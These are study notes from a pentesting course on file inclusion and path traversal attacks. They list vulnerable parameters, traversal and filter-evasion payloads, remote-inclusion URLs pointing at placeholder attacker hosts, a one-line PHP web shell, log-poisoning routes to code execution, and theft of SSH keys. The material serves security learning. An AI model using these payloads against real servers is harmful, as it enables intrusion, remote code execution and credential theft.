# Local/Remote File Inclusion OR Path Traversal

_Notes from lessons by PinkDraconian_

**What are File Inclusions?**

Consider a URL: `https://example.com/view?file=cats.txt`

The backend code accepts unsanitized user input:
```
$file = $_GET['file'];
include($file);
```

Threat - Attacker can use this to retrieve (include) any other file: `https://example.com/view?file=../../etc/passwd`

Two types:
1. **Local FI** : If the included file is local to the target (like the /etc/passwd file). Common but hard to exploit.
2. **Remote FI** : If the inlcuded file is remote to the target (attacker hosted exploit being executed by the target server). Less common but easier to exploit.

Severity: By itself it is low. Need to chain it to make it impactful. Eg: LFI leading to RCE or sensitive info exposure.

**How to find a target?**

Scenarios to lookout for:
1. Files fetched and printed to a page. `https://example.com/?file=cats.txt`
2. Files served as downloads. `https://example.com/?download=cats.mp4`
3. Files parsed by a backend interpreter. `https://example.com?load=cats.php`
4. The above examples are GET parameters. We should also look at POST fields.

List of useful parameters
```
cat   dir   action    board   date
detail    file    download    path    
folder    prefix    include   page
inc   locate    show    doc   site
type    view    content   document
layout    mod
```

## Test if the target is vulnerable
1. Grab a file that you know will exist on the system
```
Linux: /etc/passwd
Windows: %WINDIR%\win.ini
MacOS: /etc/fstab
```
2. Add a lot of `../../../` because you neet to reach `/`. And `../` of `/` is `/`.

## Evade Filters:

1. Null Byte Termination
```
?param=../../../etc/passwd%00
```
2. Double HTML encoding
3. UTF-8 encoding
4. Path and Dot truncation - PHP truncates very long filenames
```
?param-../../../etc/passwd........[Add more]
?param-../../../etc/passwd\.\.\.\.[Add more]
?param-../../../etc/passwd/./././.[Add more]
?param-../../../[Add more]../../../etc/passwd
```
5. Add extra ../ If a system removes `../` from `....//` it will still be `../`
```
?param=....//....//etc/passwd
?param=..///////..////..//////etc/passwd
?param=..///////..////..///////etc/passwd
```
6. NGINX Alias LFI
If there is an alias mapping like
```
location /i {
  alias /data/w3/images/;
 }
```
If we browse to `/i../` instead of `i` -> we will browse to `/data/w3` instead of `/data/w3/images`

7. Basic RFI
```
?param=http://evil.com/shell.php
```
8. SMB Shares - In PHP when `allow_url_include` and `allow_url_fopen` are disabled, we can use SMB shares (windows only) for file inclusion.
```
?param=\\IP\SHARE\shell.php
```

## Towards RCE

### 1. Host a malicious file on attacker's website
```
<?php 
system($_GET['c']);
?>
```
Include the malicious file
```
https://example.com/index.php?file=http://attacker.com/mal.php
```

### 2. Apache logs LFI
- You can make a request with the payload as a header. This will write it to the log file `/var/log/apache2/access.log`. 
- If you can include the log file, the server might execute the payload code.
```
# Make a request to 
https://example.com/index.php?file=/var/log/apache2/access.log&c=whoami
# Add the payload as User-Agent string
<?php system($_GET['c']);?>
```
Check if response has the output of the command passed using `c` parameter.

### 3. Through `/proc/self/environ`
- The `/proc/self/environ` contains information about the current process which is the web server.
- You can make a request with the payload as a User-Agent header.
- If you can include the `/proc/self/environ` file, you might see the result of the payload executed.


### 4. Through email
- You can send an email containing the payload to a USER.
- If you can include `/var/mail/USER`, you might see the result of the payload executed.

### 5. Using VSFTPD log
- The VSFTPD log is `/var/log/vsftpd.log`
- We can login to the VSFTPD service with the payload as the username. This invalid login will be logged.
- If you can include `/var/log/vsftpd.log`, you might see the result of the payload executed.

### 6. Using File upload
- Upload a malicious file and include it.
- Upload a zip file (file.zip) containing a php file (rce.php). Include using a **zip wrapper** `zip://file.zip%23rce.php`

### 7. Using exposed `phpinfo()`
- Check if `file_uploads = on` in the exposed phpinfo() page.
- Upload a malicious file using phpinfo. It will be stored in `/tmp` for a very short period of time.

### 8. Through SSH
- Include `/home/USER/.ssh/id_rsa`
- Get the rpivate key and crack it if needed.
- Then SSH as the user `ssh -i id_rsa user@ip`.

### 9. Through PHP sessions
- PHP session cookie info is stored in `/var/lib/php5/sess_COOKIE` file.
- Change the cookie value to the payload. It will be logged.
- If included it may show the result of payload execution.

### 10. Through `/proc/PID/fd/FD` [NOT FEASIBLE]
- Send payloads in as many services (processes) as possible.
- Bruteforce the PID and fd to find a process log file that has the result of the payload execution.

**Wrappers**

We can use wrappers to fetch source code. This itself is a vulnerability,but can als be used for further white-box analysis.

1. php://filter 
2. data://
3. input://
4. zip://
5. phar://
6. expect:// (not enabled by default)

**Wordlists**
1. [Sec lists](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt)
2. [List of files to look at](https://github.com/hussein98d/LFI-files)

**Resources**
1. [Apache LFI using log poisoning](https://www.hackingarticles.in/apache-log-poisoning-through-lfi/) 
2. [Wrappers Hacktricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion)
